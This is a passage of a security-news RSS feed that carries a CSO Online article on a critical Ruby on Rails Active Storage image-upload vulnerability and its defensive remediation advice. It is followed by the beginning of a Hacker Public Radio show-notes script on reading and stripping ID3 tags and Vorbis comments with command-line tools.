<p class="wp-block-paragraph">Forensic guidance and tooling from the Rails project can help enterprises determine whether apps are vulnerable or files are exploitable, Seker noted. It’s also important to review app, proxy, object-storage, and image-processing logs for suspicious uploads or unusual requests.</p>



<p class="wp-block-paragraph">Additionally, admins should rotate <em>secret_key_base </em>and every other credential available in Rails, invalidate active sessions, and investigate downstream systems for potentially exposed credentials.</p>



<p class="wp-block-paragraph">“Security teams should treat this as a potential secret-exposure incident, not merely a patch-management exercise,” Seker said.</p>



<h2 class="wp-block-heading">Don’t trust image processing pipelines</h2>



<p class="wp-block-paragraph">Complex image libraries support many formats and rely on numerous parsers and third-party components, creating a broad attack surface, Seker noted. Therefore, the libraries “should be treated as untrusted code execution territory.”</p>



<p class="wp-block-paragraph">Image processing should be isolated in dedicated sandboxes, containers, or restricted to workers with minimal filesystem access, he advised. There should be no unnecessary network connectivity or access to an app’s files or secrets. Strict allowlists should be applied, file content human-validated, and uploads scanned before processing and stored outside app directories. </p>



<p class="wp-block-paragraph">Additional controls should include short-lived and narrowly scoped credentials, outbound network restrictions, dependency and software composition monitoring, and automated tests that confirm that dangerous codecs or operations are disabled post-upgrade, Seker said.</p>



<p class="wp-block-paragraph">“The broader lesson is that organizations cannot assess exposure solely by asking whether they ‘use Rails,’” he noted, pointing out that two applications running the same Rails version may have very different exposure depending on their image processor, upload paths, and operating system packages. This makes visibility into runtime configuration, libraries, and app functionality critical.</p>



<p class="wp-block-paragraph">This incident also demonstrates the importance of secret rotation in vulnerability response, he added. “When a vulnerability enables arbitrary file access, installing the patch closes the entry point but does not revoke credentials that may already have been copied.”</p>



<h2 class="wp-block-heading">Don’t just assume you’re safe</h2>



<p class="wp-block-paragraph">This vulnerability illustrates a perfect use case for a software bill of materials (SBOM), which can speed up discovery of vulnerable software and triage it, Beauceron’s Shipley noted. And enterprises could also adopt intelligent web application firewall monitoring and intervention in addition to isolating systems and patching.</p>



<p class="wp-block-paragraph">“The words you never want to hear in any critical vulnerability are ‘arbitrary code execution’ and ‘remote code execution’,” he said. “Either of those can mean bad news.”</p>



<p class="wp-block-paragraph">What’s also interesting here is that the disclosure process was hijacked, he pointed out. Rails published <a href="https://discuss.rubyonrails.org/t/cve-2026-66066-attack-details-and-tools-to-perform-a-forensic-investigation/91441" target="_blank" rel="noreferrer noopener">technical details about the flaw and forensic tools</a> to assess application vulnerability to it and to look for evidence of data exfiltration nearly a month before it planned to, because several researchers had reverse-engineered the attack and published proof of concept code.</p>



<p class="wp-block-paragraph">The fact that proofs of concept are now available “materially increases the likelihood of opportunistic scanning and exploitation attempts,” Seker noted.</p>



<p class="wp-block-paragraph">Therefore, he said, “even organizations that see no obvious evidence of compromise should not assume that patching alone removes the risk created by previously exposed secrets.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.csoonline.com/article/4205383/ruby-on-rails-critical-bug-puts-every-image-upload-under-scrutiny.html" target="_blank">CSOonline</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ruby on Rails critical bug puts every image upload under scrutiny]]></title>
<description><![CDATA[A new critical vulnerability in the Ruby on Rails (“Rails”) web application framework, CVE-2026-66066, could turn a seemingly innocuous image into a front door to your secrets.



Disclosed July 30, the high severity CVE (scored 9.5 out of 10) poses a significant risk to enterprises running apps ...]]></description>
<link>https://tsecurity.de/de/3704642/it-security-nachrichten/ruby-on-rails-critical-bug-puts-every-image-upload-under-scrutiny/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704642/it-security-nachrichten/ruby-on-rails-critical-bug-puts-every-image-upload-under-scrutiny/</guid>
<pubDate>Wed, 05 Aug 2026 04:08:16 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A new critical vulnerability in the Ruby on Rails (“Rails”) web application framework, <a href="https://www.cve.org/CVERecord?id=CVE-2026-66066" target="_blank" rel="noreferrer noopener">CVE-2026-66066</a>, could turn a seemingly innocuous image into a front door to your secrets.</p>



<p class="wp-block-paragraph">Disclosed July 30, the high severity CVE (scored 9.5 out of 10) poses a significant risk to enterprises running apps that handle user-uploaded images in Rails.</p>



<p class="wp-block-paragraph">Dubbed “KindaRails2Shell,” it targets the overly-trusting Active Storage component of the open-source framework, allowing unauthenticated attackers to read sensitive files or escalate to remote code execution (RCE).</p>



<p class="wp-block-paragraph">The issue has been fixed in versions 7.2.3.2, 8.0.5.1 and 8.1.3.1 of Active Storage; enterprises running Rails should update immediately.</p>



<p class="wp-block-paragraph">“The ‘chef’s kiss’ is the ability for an attacker to upload an image that isn’t actually an image [but] is code that allows them to steal secrets,” said <a href="https://www.linkedin.com/in/dbshipley/" target="_blank" rel="noreferrer noopener">David Shipley</a> of Beauceron Security.</p>



<h2 class="wp-block-heading">Attackers get the key to the castle</h2>



<p class="wp-block-paragraph">Ruby on Rails is an open-source, server-side application framework used for building full-stack web apps and <a href="https://www.csoonline.com/article/4204548/secure-ai-adoption-starts-with-api-best-practices.html" target="_blank">application programming interfaces</a> (APIs).</p>



<p class="wp-block-paragraph">It is popular among developers because it is scalable, easy to learn and use, supports quick application development, taps into an active community of <a href="https://github.blog/engineering/architecture-optimization/building-github-with-ruby-and-rails/" target="_blank" rel="noreferrer noopener">more than 1,000 engineers</a> developing and maintaining it, and has an extensive library of nearly two million lines of prebuilt code.</p>



<p class="wp-block-paragraph">CVE-2026-66066 specifically targets Rails’ built-in Active Storage component, which lets users upload files to cloud services or local disks and link them to their applications. In particular, the vulnerability exploits the way Active Storage interacts with the <a href="https://github.com/libvips/libvips" target="_blank" rel="noreferrer noopener"><em>libvips</em> image processing library</a> to generate images.</p>



<p class="wp-block-paragraph"><em>Libvips</em> contains what are known as “unfuzzed” operations which have not been hardened against malicious inputs through techniques known as <a href="https://en.wikipedia.org/wiki/Fuzzing" target="_blank" rel="noreferrer noopener">fuzzing</a> that test where they crash, leak data, or otherwise behave erratically. This makes them unsafe for use with untrusted content, but Active Storage does not adequately disable them.</p>



<p class="wp-block-paragraph">“CVE-2026-66066 is particularly dangerous because an attacker may not need an account or privileged access,” explained <a href="https://www.sans.org/profiles/ensar-seker" target="_blank" rel="noreferrer noopener">Ensar Seker</a>, CISO at SOCRadar.</p>



<p class="wp-block-paragraph">Attackers can exploit the unsafe pipeline by uploading specially crafted files that trick Active Storage into giving them access to files that the Rails process is permitted to access, even highly-sensitive ones in app processing environments.</p>



<p class="wp-block-paragraph">In practical terms, this could expose environment variables, Rails application secrets, database credentials, cloud access keys, API tokens and credentials for connected services, Seker explained.</p>



<p class="wp-block-paragraph">Attackers can also gain access to the <em>secret_key_base</em> that signs and encrypts cookies, <a href="https://www.csoonline.com/article/570795/how-to-hack-2fa.html" target="_blank">credentials</a>, and session data. When <em>secret_key_base </em>is compromised, attackers essentially hold the key to the app.</p>



<p class="wp-block-paragraph">“The immediate vulnerability is an arbitrary file-read issue, but the theft of secrets such as Rails’ <em>secret_key_base</em> can turn information disclosure into a much broader compromise,” Seker said.</p>



<p class="wp-block-paragraph">Depending on the application, attackers could potentially forge trusted application data or sessions, access databases and cloud services, move laterally into connected systems, or achieve RCE.</p>



<p class="wp-block-paragraph">That escalation path is what makes the vulnerability critical, Seker said. “A seemingly routine image upload feature, such as a profile picture, avatar or thumbnail generator, could become an entry point into the application’s underlying infrastructure.”</p>



<h2 class="wp-block-heading">How to identify if you’re vulnerable</h2>



<p class="wp-block-paragraph">Applications are impacted when they are configured to use <em>libvips</em> for Active Storage image processing (the default behavior since Rails 7.0) and accept image uploads from untrusted or unauthenticated users. Enterprises should audit every internal and third-party app to determine whether they are configured this way, Seker advised, and patch Rails and Active Storage immediately. They should also examine every feature accepting images, including avatars, support attachments, product images, and administrative upload functions.</p>



<p class="wp-block-paragraph">Upgrading Rails alone is not sufficient when an older <em>libvips</em> installation remains underneath it; <em>libvips</em> must be version 8.13 or later, he said.</p>



<p class="wp-block-paragraph">Forensic guidance and tooling from the Rails project can help enterprises determine whether apps are vulnerable or files are exploitable, Seker noted. It’s also important to review app, proxy, object-storage, and image-processing logs for suspicious uploads or unusual requests.</p>



<p class="wp-block-paragraph">Additionally, admins should rotate <em>secret_key_base </em>and every other credential available in Rails, invalidate active sessions, and investigate downstream systems for potentially exposed credentials.</p>



<p class="wp-block-paragraph">“Security teams should treat this as a potential secret-exposure incident, not merely a patch-management exercise,” Seker said.</p>



<h2 class="wp-block-heading">Don’t trust image processing pipelines</h2>



<p class="wp-block-paragraph">Complex image libraries support many formats and rely on numerous parsers and third-party components, creating a broad attack surface, Seker noted. Therefore, the libraries “should be treated as untrusted code execution territory.”</p>



<p class="wp-block-paragraph">Image processing should be isolated in dedicated sandboxes, containers, or restricted to workers with minimal filesystem access, he advised. There should be no unnecessary network connectivity or access to an app’s files or secrets. Strict allowlists should be applied, file content human-validated, and uploads scanned before processing and stored outside app directories. </p>



<p class="wp-block-paragraph">Additional controls should include short-lived and narrowly scoped credentials, outbound network restrictions, dependency and software composition monitoring, and automated tests that confirm that dangerous codecs or operations are disabled post-upgrade, Seker said.</p>



<p class="wp-block-paragraph">“The broader lesson is that organizations cannot assess exposure solely by asking whether they ‘use Rails,’” he noted, pointing out that two applications running the same Rails version may have very different exposure depending on their image processor, upload paths, and operating system packages. This makes visibility into runtime configuration, libraries, and app functionality critical.</p>



<p class="wp-block-paragraph">This incident also demonstrates the importance of secret rotation in vulnerability response, he added. “When a vulnerability enables arbitrary file access, installing the patch closes the entry point but does not revoke credentials that may already have been copied.”</p>



<h2 class="wp-block-heading">Don’t just assume you’re safe</h2>



<p class="wp-block-paragraph">This vulnerability illustrates a perfect use case for a software bill of materials (SBOM), which can speed up discovery of vulnerable software and triage it, Beauceron’s Shipley noted. And enterprises could also adopt intelligent web application firewall monitoring and intervention in addition to isolating systems and patching.</p>



<p class="wp-block-paragraph">“The words you never want to hear in any critical vulnerability are ‘arbitrary code execution’ and ‘remote code execution’,” he said. “Either of those can mean bad news.”</p>



<p class="wp-block-paragraph">What’s also interesting here is that the disclosure process was hijacked, he pointed out. Rails published <a href="https://discuss.rubyonrails.org/t/cve-2026-66066-attack-details-and-tools-to-perform-a-forensic-investigation/91441" target="_blank" rel="noreferrer noopener">technical details about the flaw and forensic tools</a> to assess application vulnerability to it and to look for evidence of data exfiltration nearly a month before it planned to, because several researchers had reverse-engineered the attack and published proof of concept code.</p>



<p class="wp-block-paragraph">The fact that proofs of concept are now available “materially increases the likelihood of opportunistic scanning and exploitation attempts,” Seker noted.</p>



<p class="wp-block-paragraph">Therefore, he said, “even organizations that see no obvious evidence of compromise should not assume that patching alone removes the risk created by previously exposed secrets.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4698: ID3 Tags and Vorbis Comments]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.






--------------------






01 Introduction






In a response to a post on a previous episode, I said that I would take a look at ID3 tags. 


ID3 tags are text information that is added to an MP3 audio file, such as the author, dat...]]></description>
<link>https://tsecurity.de/de/3704569/podcasts/hpr4698-id3-tags-and-vorbis-comments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3704569/podcasts/hpr4698-id3-tags-and-vorbis-comments/</guid>
<pubDate>Wed, 05 Aug 2026 02:42:56 +0200</pubDate>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
01 Introduction</p>

<p>

</p>

<p>
In a response to a post on a previous episode, I said that I would take a look at ID3 tags. </p>

<p>
ID3 tags are text information that is added to an MP3 audio file, such as the author, date, name, and other information.</p>

<p>

</p>

<p>
02</p>

<p>
While I am at it I will also look at Vorbis comments, which perform a similar function for vorbis, the container format for "ogg" audio files.</p>

<p>
As example audio files, I will use a recent HPR episode, hpr4678 in both mp3 and vorbis formats plus also one from another podcast as well. </p>

<p>

</p>

<p>
03</p>

<p>
There is Free Software which you can use to view, edit, or remove both types of tags or comments, and I will describe how to use it in this episode.</p>

<p>

</p>

<p>
04</p>

<p>
I will cover how to view tags and extract the text information, as well as how to strip the tags from a file and why you may wish to do so under certain very specific circumstances.</p>

<p>

</p>

<p>
I won't cover how to add to or edit tags in an MP3 or OGG file, as that is a more involved subject that I don't have much experience with. </p>

<p>

</p>

<p>
05</p>

<p>
I will mainly talk about ID3 MP3 tags rather than vorbis comments for the simple reason that the situation with MP3 files is an utter mess while vorbis comments are very straightforward and so there isn't as much to say about them.</p>

<p>

</p>

<p>
06</p>

<p>
As often happens when researching a subject to write a podcast script, I have learned quite a bit that I didn't know previously, and discovered that things that I thought I did know were wrong.</p>

<p>
I hope that you may learn a few things from this episode that you didn't know previously either. </p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
07 Background</p>

<p>

</p>

<p>
I won't go over the detailed history of ID3 tags, as I don't have a reliable source for this.</p>

<p>
Briefly however, so far as I can determine, there is no official independent standard for ID3 tags or vorbis comments.</p>

<p>
Both seem to be more in the nature of a convention that was created by an unofficial group of contributors rather than something issued by a standards body.</p>

<p>

</p>

<p>
08</p>

<p>
However, I don't see the lack of a conventional standards body as necessarily a problem with respect to the use of ID3 tags or vorbis comments.</p>

<p>
I just am not familiar enough with the industry to know who to regard as being an authoritative source when it comes to the history and development of them</p>

<p>
Since I am unsure as who to credit with what developments, I will avoid that sort of detail.</p>

<p>

</p>

<p>
09 ID3 Tags</p>

<p>
There is a web site with the URL of ID3.org that seems to have the best reference material on the topic of ID3 tags.</p>

<p>
According to this site, the term "ID3" means "IDentify an MP3".</p>

<p>

</p>

<p>
10 Vorbis Comments</p>

<p>
For vorbis, the reference site seems to be xiph.org.</p>

<p>
Although the implementation details may differ from ID3, from our perspective as podcast listeners, they can be seen as more or less equivalent in terms of what I am going to address here.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
11 ID3 Details</p>

<p>

</p>

<p>

</p>

<p>
Versions</p>

<p>
One of the problems with ID3 is that there are multiple incompatible versions, particularly from the very early days.</p>

<p>
ID3v1 tags are located at the end of the audio file in the last 128 bytes.</p>

<p>
This was done for compatibility reasons to allow early MP3 players to simply ignore the tags if they didn't know how to deal with them. </p>

<p>
The tags would simply appear as a short burst of static from the perspective of these early players.</p>

<p>

</p>

<p>
12</p>

<p>
ID3v2 moved the tags to the start of the MP3 file to allow players to scan the tags for information such as titles without having to read to the end of the file to find them.</p>

<p>
There are far fewer limits on the amount of information that can be placed in ID3v2 tags.</p>

<p>

</p>

<p>
13</p>

<p>
ID3v1 is obsolete and only very old players will require it.</p>

<p>
However, it is still used by some publishers for backward compatibility reasons.</p>

<p>
ID3v1 included numerical musical "genre" category codes which apparently turned out to be a very bad idea in practice. </p>

<p>

</p>

<p>
14</p>

<p>
Furthermore, all genre categories above 70 were defined by an audio software company called Nullsoft who created software such as Winamp.</p>

<p>
These codes were never actually part of the ID3 standard, although there was never really a standard to begin with.</p>

<p>

</p>

<p>
15</p>

<p>
The current ID3 version is 2.3. There is a version 2.4, but apparently it is not actually generally accepted and may be a developmental dead end.</p>

<p>

</p>

<p>
16</p>

<p>
The id3.org web site contains a copy of the ID3v2.3 standard, but I am not going to address the technical details here.</p>

<p>
This would only be of interest to someone who was creating software to read and write ID3 tags.</p>

<p>

</p>

<p>
17 ID3v2 Frames</p>

<p>
The ID3v2 information is encoded into what are called "frames".</p>

<p>
The text information is contained in text information frames.</p>

<p>

</p>

<p>
18</p>

<p>
Text information frames start with a set of four character identifiers, all starting with the capital letter 'T'.</p>

<p>
Examples</p>

<p>
"TALB" is the "Album/Movie/Show title" frame.</p>

<p>
"TIT2" is the "Title/Songname/Content description" frame.</p>

<p>
"TYER" is the "Year" frame.</p>

<p>

</p>

<p>
There are many more, but I won't go into more detail here.</p>

<p>

</p>

<p>
19 HPR ID3 Tags</p>

<p>
HPR makes an interesting case study because they use both ID3v1 and ID3v2 in the same file.</p>

<p>
This can cause some interesting problems with software that tries to read those tags.</p>

<p>
This is because most software appears to expect one or the other, but not both.</p>

<p>
However, so long as this does not cause problems with anything that actually plays the files, this is not a problem so far as people who just want to listen to podcasts are concerned.</p>

<p>

</p>

<p>
It does mean though that we have more to talk about than we would otherwise would have had.</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
20 Vorbis Comment Fields</p>

<p>

</p>

<p>
The situation with Vorbis comments is much simpler, as there seems to be just one standard that was adhered to from the start rather than a succession of hacks.</p>

<p>
Information is stored in "fields", which xiph describes as being like Unix environment variables.</p>

<p>
These consist of a field name followed by an equal sign and then the information intended for that field.</p>

<p>
Field names are case insensitive.</p>

<p>

</p>

<p>
21</p>

<p>
The field names are not firmly defined at this stage, but there is a list of recommended names.</p>

<p>
Examples are</p>

<p>
"TITLE" is the Track or Work name.</p>

<p>
"ARTIST" is the person responsible for the work.</p>

<p>
"LICENSE" is the license information.</p>

<p>

</p>

<p>
22</p>

<p>
You can see the complete list for yourself on the comment field and header specification page at xiph.org</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
23 Software for Listing, Adding, and Modifying Tags and Fields</p>

<p>

</p>

<p>
There are three software packages that I will now describe which allow you to list, add, modify, and remove tags and fields.</p>

<p>
There are other packages which can do the same, including some which offer a GUI interface.</p>

<p>
However, I will limit myself to describing these three.</p>

<p>
The principles should be the same for others.</p>

<p>

</p>

<p>
24 ffprobe</p>

<p>
ffprobe is part of the ffmpeg package.</p>

<p>
If you have listened to my previous episodes on audio, you will have heard me talk about ffmpeg.</p>

<p>
ffprobe is used to display information about media files rather than for modifying them.</p>

<p>
ffprobe is licensed under the GPLv2 or later.</p>

<p>

</p>

<p>
ffprobe can be used to display information about both MP3 and OGG Vorbis files.</p>

<p>

</p>

<p>
25 ID3v2</p>

<p>
The next is the rather aptly named id3v2 and works with MP3 files.</p>

<p>
On Linux systems, this should be provided by the id3v2 package.</p>

<p>
On Debian derivatives this can be installed as follows</p>

<p>

</p>

<p>
sudo apt install id3v2</p>

<p>

</p>

<p>
26</p>

<p>
This also installs a man page which provides a brief list of the options.</p>

<p>
According to the README file in the source tarball, this is published under the LGPL</p>

<p>
ID3v2 is particularly useful for displaying ID3v1 tags.</p>

<p>

</p>

<p>
27 vorbiscomment</p>

<p>
The third is "vorbiscomment" and works with OGG files.</p>

<p>
On Linux systems this should be provided by the "vorbis-tools" package.</p>

<p>
On Debian derivatives this can be installed as follows</p>

<p>

</p>

<p>
sudo apt install vorbis-tools</p>

<p>

</p>

<p>
28</p>

<p>
The vorbiscomment program is used to list or edit comments in Ogg Vorbis files.</p>

<p>
This also installs a man page which provides a brief list of the options.</p>

<p>
According to the license.lgpl file in the source tarball, this is published under the LGPL version2.</p>

<p>

</p>

<p>
29</p>

<p>
The display format for vorbiscomment follows the data definition format in the vorbis standard, whereas ffprobe re-formats it to match its own preferred appearance. </p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
30 Examples from HPR</p>

<p>

</p>

<p>
With the background out of the way, I will now give several examples of how to list the tags or fields.</p>

<p>

</p>

<p>
31 Listing ID3v1 Tags</p>

<p>

</p>

<p>
As previously mentioned HPR uses both ID3v1 and ID3v2 tags in the same file.</p>

<p>
However, so far as I can tell, most software seems to look for ID3v2 tags first, and don't display the ID3v1 tags if both are present.</p>

<p>

</p>

<p>
32</p>

<p>
The ID3v2 program however seems to do the opposite, at least with HPR podcasts. </p>

<p>
However, the number of samples that I have which have both are rather limited, so I can't be sure if this is always the case or if this is a side effect of something else.</p>

<p>
I did mention that ID3 tags were a mess, didn't I?</p>

<p>

</p>

<p>
33</p>

<p>
Let's go on to our example however.</p>

<p>
If we want to see the ID3v1 tags, then using hpr4678 as an example, if we type</p>

<p>

</p>

<p>
id3v2 -l hpr4678.mp3</p>

<p>
=</p>

<p>
we get the following result.</p>

<p>

</p>

<p>
34</p>

<p>

</p>

<p>
id3v1 tag info for hpr4678.mp3:</p>

<p>
Title  : High Resolution Elapsed Time i  Artist: Whiskeyjack                   </p>

<p>
Album  : Hacker Public Radio             Year: 2026, Genre: Unknown (186)</p>

<p>
Comment: https://hackerpublicradio.or    Track: 0</p>

<p>
hpr4678.mp3: No ID3v2 tag</p>

<p>

</p>

<p>
35</p>

<p>
The first line tells us that this information is ID3v1 tags.</p>

<p>
The last line tells us that there are no ID3v2 tags. </p>

<p>
This last line is incorrect, but we will come back to that later.</p>

<p>

</p>

<p>
36</p>

<p>
In between are three lines of text.</p>

<p>
The first line contains the title and the artist.</p>

<p>
The title is the name of the HPR episode, or at least part of it.</p>

<p>
The artist is the HPR contributor who made that episode.</p>

<p>

</p>

<p>
37</p>

<p>
The second line contains the album name, the year, and the genre.</p>

<p>
The album name is this case is simply Hacker Public Radio, as the concept of an album doesn't really fit a podcast.</p>

<p>
The year is the year that the episode was recorded, or at least the year in which the MP3 file was assembled with the HPR intro and the tags added.</p>

<p>

</p>

<p>
38</p>

<p>
The genre is listed as "unknown 186".</p>

<p>
Recall that with ID3v1 tags there is a one byte numeric genre code, but that no genres above 70 were ever officially assigned.</p>

<p>
It seems to be a general convention though to use a code 186 for podcasts.</p>

<p>

</p>

<p>
39</p>

<p>
The third line contain a comment and track number.</p>

<p>
The comment in this case is the HPR web site URL.</p>

<p>
The track is zero.</p>

<p>
"Track" would appear to serve no useful purpose in this instance.</p>

<p>
However, it may be there for reasons of compatibility that I am unaware of, so I would be very reluctant to remove that without very good reason.</p>

<p>

</p>

<p>
40</p>

<p>
If we look at the above information in detail we can see that two of the tags appear to have cut their text information off short.</p>

<p>
The title is cut off in mid word after the 30th character.</p>

<p>
The final "g" in "hackerpublicradio.org" is cut off in the comment.</p>

<p>

</p>

<p>
41 Alternative Method for ID3v1</p>

<p>
We can confirm whether the text being cut short is due to a problem with the id3v2 program, or whether it really represents the data in the file by using a rather simple check.</p>

<p>

</p>

<p>
42</p>

<p>
Recall that ID3v1 tags are simply the last 128 bytes of the MP3 file.</p>

<p>
All we need to do is to extract the last 128 bytes of the file.</p>

<p>
We can do this using the standard tail command.</p>

<p>

</p>

<p>
tail -c128 hpr4678.mp3 | tr '\0' ' ' | tr -c '[:print:]' 'x'</p>

<p>

</p>

<p>
43</p>

<p>
The -c128 option used with tail tells it to extract the last 128 bytes of the file.</p>

<p>
We then pass the result through the "tr" command and tell it to replace null bytes with new line characters.</p>

<p>
Then we replace any remaining non-printable characters  with an 'x'.</p>

<p>

</p>

<p>
When we do that we get the following</p>

<p>

</p>

<p>
44</p>

<p>

</p>

<p>
TAGHigh Resolution Elapsed Time iWhiskeyjack                   Hacker Public Radio           2026https://hackerpublicradio.or  x</p>

<p>

</p>

<p>
45</p>

<p>
The first three characters are capital TAG.</p>

<p>
This is a flag which indicates that what follows  are ID3 tags.</p>

<p>

</p>

<p>
46</p>

<p>
Next, we have 30 characters which specify the title.</p>

<p>
The next 30 characters specify the artist.</p>

<p>
The next 30 characters are the album, or in this case just "Hacker Public Radio".</p>

<p>
The next 4 characters are the year.</p>

<p>
The next 30 characters are a comment, or in this case the HPR URL, except for the final "g".</p>

<p>
The last character is the genre code, which we have replaced with an "x" because it is otherwise non-printable.</p>

<p>

</p>

<p>
47</p>

<p>
Taken together, these add up to 128 bytes.</p>

<p>
We can see that the field lengths are of fixed length with pre-defined meanings based on position.</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
48 ID3v2 Using ffprobe</p>

<p>
Now lets move on to ID3v2 tags, which is probably more useful for most people.</p>

<p>

</p>

<p>
For this, we will switch to using ffprobe.</p>

<p>
The command for this is</p>

<p>

</p>

<p>
ffprobe -hide_banner hpr4678.mp3</p>

<p>

</p>

<p>
The -hide_banner option suppresses extra data about the codecs which doesn't interest us much and leaves mainly the tag information plus a few other things.</p>

<p>

</p>

<p>
49</p>

<p>
The output gives us the full data that is associated with the podcast episode from the HPR web site.</p>

<p>
This includes the episode number, year, full title, author, license, and full summary text.</p>

<p>
You can see a full copy of this in the show notes.</p>

<p>

</p>

<p>
Input #0, mp3, from 'hpr4678.mp3':</p>

<p>
  Metadata:</p>

<p>
	track           : 4678</p>

<p>
	year            : 2026</p>

<p>
	title           : High Resolution Elapsed Time in Shell Scripts</p>

<p>
	author          : Whiskeyjack</p>

<p>
	copyright       : CC-BY-SA</p>

<p>
	artist          : Whiskeyjack</p>

<p>
	album           : Hacker Public Radio</p>

<p>
	comment         : https://hackerpublicradio.org Clean; Surprises encountered when measuring elapsed time in shell scripts The license is CC-BY-SA</p>

<p>
	genre           : Podcast</p>

<p>
	encoder         : Lavf61.7.103</p>

<p>
	date            : 2026</p>

<p>
  Duration: 00:30:10.18, start: 0.023021, bitrate: 64 kb/s</p>

<p>
  Stream #0:0: Audio: mp3, 48000 Hz, mono, fltp, 64 kb/s</p>

<p>

</p>

<p>
50</p>

<p>
The ID3v2 tag version contains all of the information which was provided by the author, including the full title and description without the 30 character limit of ID3V1.</p>

<p>

</p>

<p>
If you want any of this information for some reason you should be able to extract it from the MP3 file using a combination of ffprobe, grep, and cut rather than trying to scrape the HPR web site and matching it to the MP3 later. </p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
51 ID3v1 Using ffprobe</p>

<p>

</p>

<p>
I previously mentioned that HPR MP3 files have both ID3v1 and ID3v2 tags in the same file, and that ffprobe will default to using ID3v2 tags if present.</p>

<p>

</p>

<p>
However, what happens if we remove the ID3v2 tags and leave the ID3v1 tags?</p>

<p>
I will describe how to strip tags later on in this episode, but let's just assume for now that I have done this.</p>

<p>

</p>

<p>
If we then use ffprobe to read the ID3 tags using the same command as before, we get the following output.</p>

<p>

</p>

<p>
52</p>

<p>
We get a series of lines in the same format as with ID3v2, but with each data element limited to at most 30 bytes.</p>

<p>
These include title, artist, album, date, comment, and genre. </p>

<p>
You can see the full output in the show notes.</p>

<p>

</p>

<p>
Input #0, mp3, from 'test.mp3':</p>

<p>
  Metadata:</p>

<p>
	title           : High Resolution Elapsed Time i</p>

<p>
	artist          : Whiskeyjack</p>

<p>
	album           : Hacker Public Radio</p>

<p>
	date            : 2026</p>

<p>
	comment         : https://hackerpublicradio.or</p>

<p>
	genre           : Podcast</p>

<p>
  Duration: 00:30:10.18, start: 0.023021, bitrate: 64 kb/s</p>

<p>
  Stream #0:0: Audio: mp3, 48000 Hz, mono, fltp, 64 kb/s</p>

<p>

</p>

<p>
53</p>

<p>
The information is the same as when read by the id3v2 program, but formatted for display in the manner that ffprobe uses. </p>

<p>

</p>

<p>
This shows that ffprobe can indeed read ID3v1 tags if they are the only ones present. </p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
54 Reading Vorbis Comments</p>

<p>
Now let us turn our attention to vorbis comments, which are the equivalent to tags for ogg files.</p>

<p>
We will look at this using two methods.</p>

<p>

</p>

<p>
55 Using vorbiscomment</p>

<p>
The first method we will look at is using the vorbiscomment package.</p>

<p>
The command is </p>

<p>

</p>

<p>
vorbiscomment -l hpr4678.ogg</p>

<p>

</p>

<p>
56</p>

<p>
The output of this is a series of lines with key value pairs separated by equal signs.</p>

<p>
The output is also exactly the same as the MP3 file, except that there is an additional "language" field, "track" becomes "TRACKNUMBER", and there is no "date" field.</p>

<p>
You can see the full output in the show notes.</p>

<p>

</p>

<p>
encoder=Lavc61.19.101 libvorbis</p>

<p>
TRACKNUMBER=4678</p>

<p>
year=2026</p>

<p>
language=English</p>

<p>
title=High Resolution Elapsed Time in Shell Scripts</p>

<p>
author=Whiskeyjack</p>

<p>
copyright=CC-BY-SA</p>

<p>
artist=Whiskeyjack</p>

<p>
album=Hacker Public Radio</p>

<p>
DESCRIPTION=https://hackerpublicradio.org Clean; Surprises encountered when measuring elapsed time in shell scripts The license is CC-BY-SA</p>

<p>
genre=Podcast</p>

<p>

</p>

<p>

</p>

<p>
57 Using ffprobe</p>

<p>
Now lets do the same again using ffprobe.</p>

<p>
The command for this is</p>

<p>

</p>

<p>
ffprobe -hide_banner hpr4678.ogg</p>

<p>

</p>

<p>
58</p>

<p>
The output content is the same of course, but the field names have all been forced to lower case, and instead of an equal sign as a separator between the key and value, this has been replaced by a colon and white space has been added to make the output look a bit nicer.</p>

<p>
You can see the full output in the show notes.</p>

<p>

</p>

<p>
Input #0, ogg, from 'hpr4678.ogg':</p>

<p>
  Duration: 00:30:10.14, start: 0.000000, bitrate: 86 kb/s</p>

<p>
  Stream #0:0(English): Audio: vorbis, 192000 Hz, mono, fltp, 4294967 kb/s</p>

<p>
	Metadata:</p>

<p>
	  encoder         : Lavc61.19.101 libvorbis</p>

<p>
	  track           : 4678</p>

<p>
	  year            : 2026</p>

<p>
	  title           : High Resolution Elapsed Time in Shell Scripts</p>

<p>
	  author          : Whiskeyjack</p>

<p>
	  copyright       : CC-BY-SA</p>

<p>
	  artist          : Whiskeyjack</p>

<p>
	  album           : Hacker Public Radio</p>

<p>
	  comment         : https://hackerpublicradio.org Clean; Surprises encountered when measuring elapsed time in shell scripts The license is CC-BY-SA</p>

<p>
	  genre           : Podcast</p>

<p>

</p>

<p>

</p>

<p>

</p>

<p>
--------------------</p>

<p>

</p>

<p>
59 Another Example from Another Podcast</p>

<p>

</p>

<p>
The above is interesting, but it's a sample of one podcast. Let's look at another different one altogether.</p>

<p>
For this test I used two episodes of the Linux Matters podcast, episodes 68 and 82. As to why I am using two different episodes I will explain in a moment.</p>

<p>

</p>

<p>
60 Episode 68</p>

<p>
We will start with examining episode 68</p>

<p>

</p>

<p>
Using id3v2</p>

<p>
The command using id3v2 is</p>

<p>

</p>

<p>
id3v2 -l LMP68.mp3</p>

<p>

</p>

<p>
